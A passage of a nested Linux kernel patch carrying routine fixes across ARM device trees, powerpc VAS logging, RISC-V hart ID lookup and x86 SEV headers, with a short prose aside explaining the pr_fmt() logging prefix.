+ 
+-	return 0;
++	if (xen_kernel_unmapped_at_usr())
++		return 0;
++
++	xen_time_setup_guest();
++
++	return cpuhp_setup_state(CPUHP_AP_ARM_XEN_RUNSTATE_STARTING,
++				 "arm/xen_runstate:starting",
++				 xen_starting_runstate_cpu, NULL);
+ }
+-late_initcall(xen_pm_init);
++late_initcall(xen_late_init);
+ 
+ 
+ /* empty stubs */
+diff --git a/arch/arm64/boot/dts/freescale/imx8mm.dtsi b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+index 12c82bb1bb7aa..d583db18f74cc 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mm.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mm.dtsi
+@@ -398,6 +398,7 @@
+ 						      "pll8k", "pll11k", "clkext3";
+ 					dmas = <&sdma2 24 25 0x80000000>;
+ 					dma-names = "rx";
++					#sound-dai-cells = <0>;
+ 					status = "disabled";
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn.dtsi b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+index 37246ca9d9075..66fadbf19f0a3 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn.dtsi
+@@ -370,6 +370,7 @@
+ 						      "pll8k", "pll11k", "clkext3";
+ 					dmas = <&sdma2 24 25 0x80000000>;
+ 					dma-names = "rx";
++					#sound-dai-cells = <0>;
+ 					status = "disabled";
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi b/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi
+index 7764b4146e0ab..2bbdacb1313f9 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8qm-ss-img.dtsi
+@@ -8,5 +8,5 @@
+ };
+ 
+ &jpegenc {
+-	compatible = "nxp,imx8qm-jpgdec", "nxp,imx8qxp-jpgenc";
++	compatible = "nxp,imx8qm-jpgenc", "nxp,imx8qxp-jpgenc";
+ };
+diff --git a/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi b/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi
+index 8e4ec243fb8fc..e5fc6cca50e74 100644
+--- a/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi
++++ b/arch/arm64/boot/dts/marvell/cn9130-crb.dtsi
+@@ -120,7 +120,7 @@
+ 				       "mpp59", "mpp60", "mpp61";
+ 			marvell,function = "sdio";
+ 		};
+-		cp0_spi0_pins: cp0-spi-pins-0 {
++		cp0_spi1_pins: cp0-spi-pins-1 {
+ 			marvell,pins = "mpp13", "mpp14", "mpp15", "mpp16";
+ 			marvell,function = "spi1";
+ 		};
+@@ -170,7 +170,7 @@
+ 
+ &cp0_spi1 {
+ 	pinctrl-names = "default";
+-	pinctrl-0 = <&cp0_spi0_pins>;
++	pinctrl-0 = <&cp0_spi1_pins>;
+ 	reg = <0x700680 0x50>,		/* control */
+ 	      <0x2000000 0x1000000>;	/* CS0 */
+ 	status = "okay";
+diff --git a/arch/arm64/boot/dts/marvell/cn9130-db.dtsi b/arch/arm64/boot/dts/marvell/cn9130-db.dtsi
+index c7de1ea0d470a..6eb6a175de38d 100644
+--- a/arch/arm64/boot/dts/marvell/cn9130-db.dtsi
++++ b/arch/arm64/boot/dts/marvell/cn9130-db.dtsi
+@@ -307,7 +307,7 @@
+ &cp0_spi1 {
+ 	status = "disabled";
+ 	pinctrl-names = "default";
+-	pinctrl-0 = <&cp0_spi0_pins>;
++	pinctrl-0 = <&cp0_spi1_pins>;
+ 	reg = <0x700680 0x50>;
+ 
+ 	flash@0 {
+@@ -371,7 +371,7 @@
+ 				       "mpp59", "mpp60", "mpp61";
+ 			marvell,function = "sdio";
+ 		};
+-		cp0_spi0_pins: cp0-spi-pins-0 {
++		cp0_spi1_pins: cp0-spi-pins-1 {
+ 			marvell,pins = "mpp13", "mpp14", "mpp15", "mpp16";
+ 			marvell,function = "spi1";
+ 		};
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234.dtsi b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+index dfe2cf2f4b218..6598e9ac52b81 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra234.dtsi
+@@ -532,12 +532,12 @@
+ 				     <GIC_SPI 7 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 8 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 9 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 10 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 11 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 12 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 13 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 14 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 15 IRQ_TYPE_LEVEL_HIGH>;
++				     <GIC_SPI 256 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 257 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 258 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 259 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 260 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 261 IRQ_TYPE_LEVEL_HIGH>;
+ 			status = "okay";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index 9650ae70c8723..9d116e1fbe10c 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -200,6 +200,9 @@
+ 		pd-gpios = <&msmgpio 32 GPIO_ACTIVE_HIGH>;
+ 
+ 		avdd-supply = <&pm8916_l6>;
++		a2vdd-supply = <&pm8916_l6>;
++		dvdd-supply = <&pm8916_l6>;
++		pvdd-supply = <&pm8916_l6>;
+ 		v1p2-supply = <&pm8916_l6>;
+ 		v3p3-supply = <&pm8916_l17>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8916.dtsi b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+index f84b3c1a03c53..bafac2cf7e3d6 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8916.dtsi
+@@ -1257,7 +1257,7 @@
+ 			#size-cells = <1>;
+ 			#iommu-cells = <1>;
+ 			compatible = "qcom,msm8916-iommu", "qcom,msm-iommu-v1";
+-			ranges = <0 0x01e20000 0x40000>;
++			ranges = <0 0x01e20000 0x20000>;
+ 			reg = <0x01ef0000 0x3000>;
+ 			clocks = <&gcc GCC_SMMU_CFG_CLK>,
+ 				 <&gcc GCC_APSS_TCU_CLK>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+index 3ab0ad14e8704..95eab1f379229 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
++++ b/arch/arm64/boot/dts/qcom/msm8992-xiaomi-libra.dts
+@@ -109,11 +109,6 @@
+ 			qcom,client-id = <1>;
+ 		};
+ 
+-		audio_mem: audio@cb400000 {
+-			reg = <0 0xcb000000 0 0x400000>;
+-			no-mem;
+-		};
+-
+ 		qseecom_mem: qseecom@cb400000 {
+ 			reg = <0 0xcb400000 0 0x1c00000>;
+ 			no-mem;
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 0cdc579f26de7..aea356c63b9a3 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -820,7 +820,8 @@
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>,
+ 				 <&rpmhcc RPMH_CXO_CLK_A>, <&sleep_clk>,
+ 				 <0>, <&pcie1_lane>,
+-				 <0>, <0>, <0>, <0>;
++				 <0>, <0>, <0>,
++				 <&usb_1_ssphy>;
+ 			clock-names = "bi_tcxo", "bi_tcxo_ao", "sleep_clk",
+ 				      "pcie_0_pipe_clk", "pcie_1_pipe_clk",
+ 				      "ufs_phy_rx_symbol_0_clk", "ufs_phy_rx_symbol_1_clk",
+@@ -5337,6 +5338,14 @@
+ 			reg = <0 0x18591000 0 0x1000>,
+ 			      <0 0x18592000 0 0x1000>,
+ 			      <0 0x18593000 0 0x1000>;
++
++			interrupts = <GIC_SPI 30 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 31 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 19 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "dcvsh-irq-0",
++					  "dcvsh-irq-1",
++					  "dcvsh-irq-2";
++
+ 			clocks = <&rpmhcc RPMH_CXO_CLK>, <&gcc GCC_GPLL0>;
+ 			clock-names = "xo", "alternate";
+ 			#freq-domain-cells = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+index b5f11fbcc3004..a5c0c788969fb 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-cheza.dtsi
+@@ -145,6 +145,10 @@
+ 	};
+ };
+ 
++&cpufreq_hw {
++	/delete-property/ interrupts-extended; /* reference to lmh_cluster[01] */
++};
++
+ &psci {
+ 	/delete-node/ cpu0;
+ 	/delete-node/ cpu1;
+@@ -277,6 +281,14 @@
+ 			   &CLUSTER_SLEEP_0>;
+ };
+ 
++&lmh_cluster0 {
++	status = "disabled";
++};
++
++&lmh_cluster1 {
++	status = "disabled";
++};
++
+ /*
+  * Reserved memory changes
+  *
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+index de2d10e0315af..64958dee17d8b 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
++++ b/arch/arm64/boot/dts/qcom/sdm845-mtp.dts
+@@ -714,6 +714,8 @@
+ 	vdd-1.8-xo-supply = <&vreg_l7a_1p8>;
+ 	vdd-1.3-rfa-supply = <&vreg_l17a_1p3>;
+ 	vdd-3.3-ch0-supply = <&vreg_l25a_3p3>;
++
++	qcom,snoc-host-cap-8bit-quirk;
+ };
+ 
+ /* PINCTRL - additions to nodes defined in sdm845.dtsi */
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index de794a5078dfc..c586378fc6bc7 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1839,8 +1839,12 @@
+ 			ranges;
+ 			clocks = <&gcc GCC_PCIE_PHY_AUX_CLK>,
+ 				 <&gcc GCC_PCIE_0_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_0_CLKREF_CLK>,
+ 				 <&gcc GCC_PCIE0_PHY_REFGEN_CLK>;
+-			clock-names = "aux", "cfg_ahb", "refgen";
++			clock-names = "aux",
++				      "cfg_ahb",
++				      "ref",
++				      "refgen";
+ 
+ 			resets = <&gcc GCC_PCIE_0_PHY_BCR>;
+ 			reset-names = "phy";
+@@ -1938,8 +1942,12 @@
+ 			ranges;
+ 			clocks = <&gcc GCC_PCIE_PHY_AUX_CLK>,
+ 				 <&gcc GCC_PCIE_1_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_1_CLKREF_CLK>,
+ 				 <&gcc GCC_PCIE1_PHY_REFGEN_CLK>;
+-			clock-names = "aux", "cfg_ahb", "refgen";
++			clock-names = "aux",
++				      "cfg_ahb",
++				      "ref",
++				      "refgen";
+ 
+ 			resets = <&gcc GCC_PCIE_1_PHY_BCR>;
+ 			reset-names = "phy";
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index b3245b13b2611..793768a2c9e1e 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -1778,7 +1778,7 @@
+ 			};
+ 
+ 			qup_uart18_default: qup-uart18-default-state {
+-				pins = "gpio58", "gpio59";
++				pins = "gpio68", "gpio69";
+ 				function = "qup18";
+ 				drive-strength = <2>;
+ 				bias-disable;
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+index b08a083d722d4..7f265c671654d 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
++++ b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+@@ -172,7 +172,7 @@
+ 	status = "okay";
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&main_i2c1_pins_default>;
+-	clock-frequency = <400000>;
++	clock-frequency = <100000>;
+ 
+ 	exp1: gpio@22 {
+ 		compatible = "ti,tca6424";
+diff --git a/arch/arm64/include/asm/cputype.h b/arch/arm64/include/asm/cputype.h
+index 357932938b5ab..7dce9c0aa7836 100644
+--- a/arch/arm64/include/asm/cputype.h
++++ b/arch/arm64/include/asm/cputype.h
+@@ -85,7 +85,8 @@
+ #define ARM_CPU_PART_NEOVERSE_N2	0xD49
+ #define ARM_CPU_PART_CORTEX_A78C	0xD4B
+ 
+-#define APM_CPU_PART_POTENZA		0x000
++#define APM_CPU_PART_XGENE		0x000
++#define APM_CPU_VAR_POTENZA		0x00
+ 
+ #define CAVIUM_CPU_PART_THUNDERX	0x0A1
+ #define CAVIUM_CPU_PART_THUNDERX_81XX	0x0A2
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index dd20b8688d230..f44ae09a51956 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -863,7 +863,7 @@ u32 __attribute_const__ kvm_target_cpu(void)
+ 		break;
+ 	case ARM_CPU_IMP_APM:
+ 		switch (part_number) {
+-		case APM_CPU_PART_POTENZA:
++		case APM_CPU_PART_XGENE:
+ 			return KVM_ARM_TARGET_XGENE_POTENZA;
+ 		}
+ 		break;
+diff --git a/arch/powerpc/include/asm/nohash/32/pte-40x.h b/arch/powerpc/include/asm/nohash/32/pte-40x.h
+index 2d3153cfc0d79..acf61242e85bf 100644
+--- a/arch/powerpc/include/asm/nohash/32/pte-40x.h
++++ b/arch/powerpc/include/asm/nohash/32/pte-40x.h
+@@ -69,9 +69,6 @@
+ 
+ #define _PTE_NONE_MASK	0
+ 
+-/* Until my rework is finished, 40x still needs atomic PTE updates */
+-#define PTE_ATOMIC_UPDATES	1
+-
+ #define _PAGE_BASE_NC	(_PAGE_PRESENT | _PAGE_ACCESSED)
+ #define _PAGE_BASE	(_PAGE_BASE_NC)
+ 
+diff --git a/arch/powerpc/kernel/traps.c b/arch/powerpc/kernel/traps.c
+index 9bdd79aa51cfc..3956f32682c62 100644
+--- a/arch/powerpc/kernel/traps.c
++++ b/arch/powerpc/kernel/traps.c
+@@ -1164,6 +1164,7 @@ static void emulate_single_step(struct pt_regs *regs)
+ 		__single_step_exception(regs);
+ }
+ 
++#ifdef CONFIG_PPC_FPU_REGS
+ static inline int __parse_fpscr(unsigned long fpscr)
+ {
+ 	int ret = FPE_FLTUNK;
+@@ -1190,6 +1191,7 @@ static inline int __parse_fpscr(unsigned long fpscr)
+ 
+ 	return ret;
+ }
++#endif
+ 
+ static void parse_fpe(struct pt_regs *regs)
+ {
+diff --git a/arch/powerpc/perf/imc-pmu.c b/arch/powerpc/perf/imc-pmu.c
+index 9d229ef7f86ef..ada817c49b722 100644
+--- a/arch/powerpc/perf/imc-pmu.c
++++ b/arch/powerpc/perf/imc-pmu.c
+@@ -51,7 +51,7 @@ static int trace_imc_mem_size;
+  * core and trace-imc
+  */
+ static struct imc_pmu_ref imc_global_refc = {
+-	.lock = __SPIN_LOCK_INITIALIZER(imc_global_refc.lock),
++	.lock = __SPIN_LOCK_UNLOCKED(imc_global_refc.lock),
+ 	.id = 0,
+ 	.refc = 0,
+ };
+diff --git a/arch/powerpc/platforms/book3s/vas-api.c b/arch/powerpc/platforms/book3s/vas-api.c
+index 40f5ae5e1238d..92e60cb3163fa 100644
+--- a/arch/powerpc/platforms/book3s/vas-api.c
++++ b/arch/powerpc/platforms/book3s/vas-api.c
+@@ -4,6 +4,8 @@
+  * Copyright (C) 2019 Haren Myneni, IBM Corp
+  */
+ 
++#define pr_fmt(fmt)	"vas-api: " fmt
++
+ #include <linux/kernel.h>
+ #include <linux/device.h>
+ #include <linux/cdev.h>
+@@ -78,7 +80,7 @@ int get_vas_user_win_ref(struct vas_user_win_ref *task_ref)
+ 	task_ref->mm = get_task_mm(current);
+ 	if (!task_ref->mm) {
+ 		put_pid(task_ref->pid);
+-		pr_err("VAS: pid(%d): mm_struct is not found\n",
++		pr_err("pid(%d): mm_struct is not found\n",
+ 				current->pid);
+ 		return -EPERM;
+ 	}
+@@ -235,8 +237,7 @@ void vas_update_csb(struct coprocessor_request_block *crb,
+ 	rc = kill_pid_info(SIGSEGV, &info, pid);
+ 	rcu_read_unlock();
+ 
+-	pr_devel("%s(): pid %d kill_proc_info() rc %d\n", __func__,
+-			pid_vnr(pid), rc);
++	pr_devel("pid %d kill_proc_info() rc %d\n", pid_vnr(pid), rc);
+ }
+ 
+ void vas_dump_crb(struct coprocessor_request_block *crb)
+@@ -294,7 +295,7 @@ static int coproc_ioc_tx_win_open(struct file *fp, unsigned long arg)
+ 
+ 	rc = copy_from_user(&uattr, uptr, sizeof(uattr));
+ 	if (rc) {
+-		pr_err("%s(): copy_from_user() returns %d\n", __func__, rc);
++		pr_err("copy_from_user() returns %d\n", rc);
+ 		return -EFAULT;
+ 	}
+ 
+@@ -311,7 +312,7 @@ static int coproc_ioc_tx_win_open(struct file *fp, unsigned long arg)
+ 	txwin = cp_inst->coproc->vops->open_win(uattr.vas_id, uattr.flags,
+ 						cp_inst->coproc->cop_type);
+ 	if (IS_ERR(txwin)) {
+-		pr_err("%s() VAS window open failed, %ld\n", __func__,
++		pr_err_ratelimited("VAS window open failed rc=%ld\n",
+ 				PTR_ERR(txwin));
+ 		return PTR_ERR(txwin);
+ 	}
+@@ -405,8 +406,7 @@ static vm_fault_t vas_mmap_fault(struct vm_fault *vmf)
+ 	 * window is not opened. Shouldn't expect this error.
+ 	 */
+ 	if (!cp_inst || !cp_inst->txwin) {
+-		pr_err("%s(): Unexpected fault on paste address with TX window closed\n",
+-				__func__);
++		pr_err("Unexpected fault on paste address with TX window closed\n");
+ 		return VM_FAULT_SIGBUS;
+ 	}
+ 
+@@ -421,8 +421,7 @@ static vm_fault_t vas_mmap_fault(struct vm_fault *vmf)
+ 	 * issue NX request.
+ 	 */
+ 	if (txwin->task_ref.vma != vmf->vma) {
+-		pr_err("%s(): No previous mapping with paste address\n",
+-			__func__);
++		pr_err("No previous mapping with paste address\n");
+ 		return VM_FAULT_SIGBUS;
+ 	}
+ 
+@@ -481,19 +480,19 @@ static int coproc_mmap(struct file *fp, struct vm_area_struct *vma)
+ 	txwin = cp_inst->txwin;
+ 
+ 	if ((vma->vm_end - vma->vm_start) > PAGE_SIZE) {
+-		pr_debug("%s(): size 0x%zx, PAGE_SIZE 0x%zx\n", __func__,
++		pr_debug("size 0x%zx, PAGE_SIZE 0x%zx\n",
+ 				(vma->vm_end - vma->vm_start), PAGE_SIZE);
+ 		return -EINVAL;
+ 	}
+ 
+ 	/* Ensure instance has an open send window */
+ 	if (!txwin) {
+-		pr_err("%s(): No send window open?\n", __func__);
++		pr_err("No send window open?\n");
+ 		return -EINVAL;
+ 	}
+ 
+ 	if (!cp_inst->coproc->vops || !cp_inst->coproc->vops->paste_addr) {
+-		pr_err("%s(): VAS API is not registered\n", __func__);
++		pr_err("VAS API is not registered\n");
+ 		return -EACCES;
+ 	}
+ 
+@@ -510,14 +509,14 @@ static int coproc_mmap(struct file *fp, struct vm_area_struct *vma)
+ 	 */
+ 	mutex_lock(&txwin->task_ref.mmap_mutex);
+ 	if (txwin->status != VAS_WIN_ACTIVE) {
+-		pr_err("%s(): Window is not active\n", __func__);
++		pr_err("Window is not active\n");
+ 		rc = -EACCES;
+ 		goto out;
+ 	}
+ 
+ 	paste_addr = cp_inst->coproc->vops->paste_addr(txwin);
+ 	if (!paste_addr) {
+-		pr_err("%s(): Window paste address failed\n", __func__);
++		pr_err("Window paste address failed\n");
+ 		rc = -EINVAL;
+ 		goto out;
+ 	}
+@@ -533,8 +532,8 @@ static int coproc_mmap(struct file *fp, struct vm_area_struct *vma)
+ 	rc = remap_pfn_range(vma, vma->vm_start, pfn + vma->vm_pgoff,
+ 			vma->vm_end - vma->vm_start, prot);
+ 
+-	pr_devel("%s(): paste addr %llx at %lx, rc %d\n", __func__,
+-			paste_addr, vma->vm_start, rc);
++	pr_devel("paste addr %llx at %lx, rc %d\n", paste_addr,
++			vma->vm_start, rc);
+ 
+ 	txwin->task_ref.vma = vma;
+ 	vma->vm_ops = &vas_vm_ops;
+@@ -609,8 +608,7 @@ int vas_register_coproc_api(struct module *mod, enum vas_cop_type cop_type,
+ 		goto err;
+ 	}
+ 
+-	pr_devel("%s: Added dev [%d,%d]\n", __func__, MAJOR(devno),
+-			MINOR(devno));
++	pr_devel("Added dev [%d,%d]\n", MAJOR(devno), MINOR(devno));
+ 
+ 	return 0;
+ 
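The pr_fmt() define added at the top of vas-api.c is what makes the
"%s(): ", __func__ prefixes above removable: the kernel's printk wrappers
expand pr_fmt() around every format string in the file. A minimal sketch of
the convention (assumed example, not from the patch):

	#define pr_fmt(fmt) "vas-api: " fmt	/* must precede the includes */
	#include <linux/printk.h>

	/* inside any function in the file: */
	pr_err("pid(%d): mm_struct is not found\n", 1234);
	/* logged as: "vas-api: pid(1234): mm_struct is not found" */
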
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 2c2812a87d470..541199c6a587d 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -524,8 +524,10 @@ static ssize_t vcpudispatch_stats_write(struct file *file, const char __user *p,
+ 
+ 	if (cmd) {
+ 		rc = init_cpu_associativity();
+-		if (rc)
++		if (rc) {
++			destroy_cpu_associativity();
+ 			goto out;
++		}
+ 
+ 		for_each_possible_cpu(cpu) {
+ 			disp = per_cpu_ptr(&vcpu_disp_data, cpu);
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 041a25c08066b..5db8060776b0c 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -340,7 +340,7 @@ static struct vas_window *vas_allocate_window(int vas_id, u64 flags,
+ 
+ 	if (atomic_inc_return(&cop_feat_caps->nr_used_credits) >
+ 			atomic_read(&cop_feat_caps->nr_total_credits)) {
+-		pr_err("Credits are not available to allocate window\n");
++		pr_err_ratelimited("Credits are not available to allocate window\n");
+ 		rc = -EINVAL;
+ 		goto out;
+ 	}
+@@ -423,7 +423,7 @@ static struct vas_window *vas_allocate_window(int vas_id, u64 flags,
+ 
+ 	put_vas_user_win_ref(&txwin->vas_win.task_ref);
+ 	rc = -EBUSY;
+-	pr_err("No credit is available to allocate window\n");
++	pr_err_ratelimited("No credit is available to allocate window\n");
+ 
+ out_free:
+ 	/*
+diff --git a/arch/powerpc/sysdev/xive/native.c b/arch/powerpc/sysdev/xive/native.c
+index 3925825954bcc..e5baa91ddd07b 100644
+--- a/arch/powerpc/sysdev/xive/native.c
++++ b/arch/powerpc/sysdev/xive/native.c
+@@ -804,7 +804,7 @@ int xive_native_get_queue_info(u32 vp_id, u32 prio,
+ 	if (out_qpage)
+ 		*out_qpage = be64_to_cpu(qpage);
+ 	if (out_qsize)
+-		*out_qsize = be32_to_cpu(qsize);
++		*out_qsize = be64_to_cpu(qsize);
+ 	if (out_qeoi_page)
+ 		*out_qeoi_page = be64_to_cpu(qeoi_page);
+ 	if (out_escalate_irq)
+diff --git a/arch/riscv/kernel/cpu.c b/arch/riscv/kernel/cpu.c
+index 852ecccd8920f..0f76181dc634d 100644
+--- a/arch/riscv/kernel/cpu.c
++++ b/arch/riscv/kernel/cpu.c
+@@ -57,13 +57,14 @@ int riscv_of_processor_hartid(struct device_node *node, unsigned long *hart)
+  */
+ int riscv_of_parent_hartid(struct device_node *node, unsigned long *hartid)
+ {
+-	int rc;
+-
+ 	for (; node; node = node->parent) {
+ 		if (of_device_is_compatible(node, "riscv")) {
+-			rc = riscv_of_processor_hartid(node, hartid);
+-			if (!rc)
+-				return 0;
++			*hartid = (unsigned long)of_get_cpu_hwid(node, 0);
++			if (*hartid == ~0UL) {
++				pr_warn("Found CPU without hart ID\n");
++				return -ENODEV;
++			}
++			return 0;
+ 		}
+ 	}
+ 
+diff --git a/arch/sh/Kconfig.debug b/arch/sh/Kconfig.debug
+index c449e7c1b20ff..8bcd6c1431a95 100644
+--- a/arch/sh/Kconfig.debug
++++ b/arch/sh/Kconfig.debug
+@@ -22,6 +22,17 @@ config STACK_DEBUG
+ 	  every function call and will therefore incur a major
+ 	  performance hit. Most users should say N.
+ 
++config EARLY_PRINTK
++	bool "Early printk"
++	depends on SH_STANDARD_BIOS
++	help
++	  Say Y here to redirect kernel printk messages to the serial port
++	  used by the SH-IPL bootloader, starting very early in the boot
++	  process and ending when the kernel's serial console is initialised.
++	  This option is only useful while porting the kernel to a new machine,
++	  when the kernel may crash or hang before the serial console is
++	  initialised.  If unsure, say N.
++
+ config 4KSTACKS
+ 	bool "Use 4Kb for kernel stacks instead of 8Kb"
+ 	depends on DEBUG_KERNEL && (MMU || BROKEN) && !PAGE_SIZE_64KB
+diff --git a/arch/x86/include/asm/sev-common.h b/arch/x86/include/asm/sev-common.h
+index b63be696b776a..0759af9b1acfc 100644
+--- a/arch/x86/include/asm/sev-common.h
++++ b/arch/x86/include/asm/sev-common.h
+@@ -128,10 +128,6 @@ struct snp_psc_desc {
+ 	struct psc_entry entries[VMGEXIT_PSC_MAX_ENTRY];
+ } __packed;
+ 
+-/* Guest message request error codes */
+-#define SNP_GUEST_REQ_INVALID_LEN	BIT_ULL(32)
+-#define SNP_GUEST_REQ_ERR_BUSY		BIT_ULL(33)
+-
+ #define GHCB_MSR_TERM_REQ		0x100
+ #define GHCB_MSR_TERM_REASON_SET_POS	12
+ #define GHCB_MSR_TERM_REASON_SET_MASK	0xf
+diff --git a/arch/x86/include/asm/sev.h b/arch/x86/include/asm/sev.h
+index a0a58c4122ec3..7ca5c9ec8b52e 100644
+--- a/arch/x86/include/asm/sev.h
++++ b/arch/x86/include/asm/sev.h
+@@ -9,6 +9,8 @@
+ #define __ASM_ENCRYPTED_STATE_H
+ 
+ #include <linux/types.h>
++#include <linux/sev-guest.h>
++
+ #include <asm/insn.h>
+ #include <asm/sev-common.h>
+ #include <asm/bootparam.h>
+@@ -185,6 +187,9 @@ static inline int pvalidate(unsigned long vaddr, bool rmp_psize, bool validate)
+ 
+ 	return rc;
+ }
++
++struct snp_guest_request_ioctl;
++
+ void setup_ghcb(void);
+ void __init early_snp_set_memory_private(unsigned long vaddr, unsigned long paddr,
+ 					 unsigned long npages);
+@@ -196,7 +201,7 @@ void snp_set_memory_private(unsigned long vaddr, unsigned long npages);
+ void snp_set_wakeup_secondary_cpu(void);
+ bool snp_init(struct boot_params *bp);
+ void __init __noreturn snp_abort(void);
+-int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, unsigned long *fw_err);
++int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio);
+ #else
+ static inline void sev_es_ist_enter(struct pt_regs *regs) { }
+ static inline void sev_es_ist_exit(void) { }
+@@ -216,8 +221,7 @@ static inline void snp_set_memory_private(unsigned long vaddr, unsigned long npa
+ static inline void snp_set_wakeup_secondary_cpu(void) { }
+ static inline bool snp_init(struct boot_params *bp) { return false; }
+ static inline void snp_abort(void) { }
+-static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input,
+-					  unsigned long *fw_err)
++static inline int snp_issue_guest_request(u64 exit_code, struct snp_req_data *input, struct snp_guest_request_ioctl *rio)
+ {
+ 	return -ENOTTY;
+ }
+diff --git a/arch/x86/include/asm/sparsemem.h b/arch/x86/include/asm/sparsemem.h
+index 64df897c0ee30..1be13b2dfe8bf 100644
+--- a/arch/x86/include/asm/sparsemem.h
++++ b/arch/x86/include/asm/sparsemem.h
+@@ -37,6 +37,8 @@ extern int phys_to_target_node(phys_addr_t start);
+ #define phys_to_target_node phys_to_target_node
+ extern int memory_add_physaddr_to_nid(u64 start);
+ #define memory_add_physaddr_to_nid memory_add_physaddr_to_nid
++extern int numa_fill_memblks(u64 start, u64 end);
++#define numa_fill_memblks numa_fill_memblks
+ #endif
+ #endif /* __ASSEMBLY__ */
+ 
+diff --git a/arch/x86/include/asm/uaccess.h b/arch/x86/include/asm/uaccess.h
+index 1cc756eafa447..6ca0c661cb637 100644
+--- a/arch/x86/include/asm/uaccess.h
++++ b/arch/x86/include/asm/uaccess.h
+@@ -518,7 +518,7 @@ copy_mc_to_kernel(void *to, const void *from, unsigned len);
+ #define copy_mc_to_kernel copy_mc_to_kernel
+ 
+ unsigned long __must_check
